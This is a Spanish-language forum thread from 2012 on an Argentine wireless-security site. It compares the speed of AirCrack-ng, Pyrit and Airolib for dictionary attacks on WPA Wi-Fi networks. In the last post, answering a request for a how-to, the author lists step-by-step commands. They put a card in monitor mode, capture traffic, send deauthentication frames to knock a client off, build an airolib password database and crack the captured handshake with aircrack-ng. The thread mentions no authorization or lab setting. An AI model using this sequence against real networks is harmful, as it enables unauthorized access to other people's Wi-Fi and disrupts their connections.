Arg-Wireless - Foro de Argentina

[In]Seguridad Informática => Seguridad General => Linux => Mensaje publicado por: D3M0N en 25 de Noviembre de 2012, 05:05:51 PM

Título: AirCrack-ng vs Pyrit vs Airolib ¿Quien es el más rapido?
Publicado por: D3M0N en 25 de Noviembre de 2012, 05:05:51 PM
(https://www.arg-wireless.com.ar/proxy.php?request=http%3A%2F%2Fi.minus.com%2FiAU9t1M9o71rm.PNG&hash=8264d7c648ead093550a8bcc95913b5af0ea0a72)

Bien, en esta pequeña tabla podemos ver los tres metodos conocidos para realizar un Ataque por diccionario a una red WPA, tomando un ordenador viejo con tan solo 1GB de RAM podemos obtener los siguientes datos expuestos en la tabla anterior.

Desde ya AirCrack-NG + AiroLib es la mejor opción, pues en 15 Minutos podemos pasar un diccionario completo de 8 Caracteres.
Título: Re:AirCrack-ng vs Pyrit vs Airolib ¿Quien es el más rapido?
Publicado por: MJBlack84 en 26 de Noviembre de 2012, 05:39:53 PM
Hola, he estado viendo tus resultados de la comparacion de quien es mas rapido, pero no he encontrado en ninguna parte del foro el sitio donde expliquen la utilizacion de cada uno de los metodos....

Podrias por favor ser tan amable de dar un "how to" con el AirCrack+Airolib? he utilizado Reaver y el aircrack, pero de este no tenia conocimiento...
Saludos...Gracias de antemano.
Título: Re:AirCrack-ng vs Pyrit vs Airolib ¿Quien es el más rapido?
Publicado por: D3M0N en 26 de Noviembre de 2012, 06:03:49 PM
Acá tenes Videos: http://www.arg-wireless.com.ar/index.php/topic,270.msg680.html#msg680

algunos comandos paso a paso:


airmon-ng start <interfaz>
airodump-ng <interfaz-modo-monitor>

Tomamos los datos necesarios:

essid = ??? (Puede estar oculta)
wpa2(AES) = ?
bssid = MAC ADDRESS
Client = MAC Address Cliente
channel = Canal

------------Nuevo Terminal------------

airodump-ng --bssid <MAC-AP> -c <Canal> -w output <Interfaz-modo-Monitor>

------------Nuevo Terminal------------

aireplay-ng --deauth 10 -a <MAC-AP> -c <MAC-Cliente> < Interfaz-modo-Monitor>

Con esto logramos ver en la pestaña de Airodump-ng el ESSID, Esperaremos a capturar el WPA Handshake.

------------Nuevo Terminal------------

airolib-ng crackwpa --import passwd /dirección/del/Dic/ESSID.lst
airolib-ng crackwpa --import essid ./essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all

------------Nuevo Terminal------------

aircrack-ng -r crackwpa output-01.cap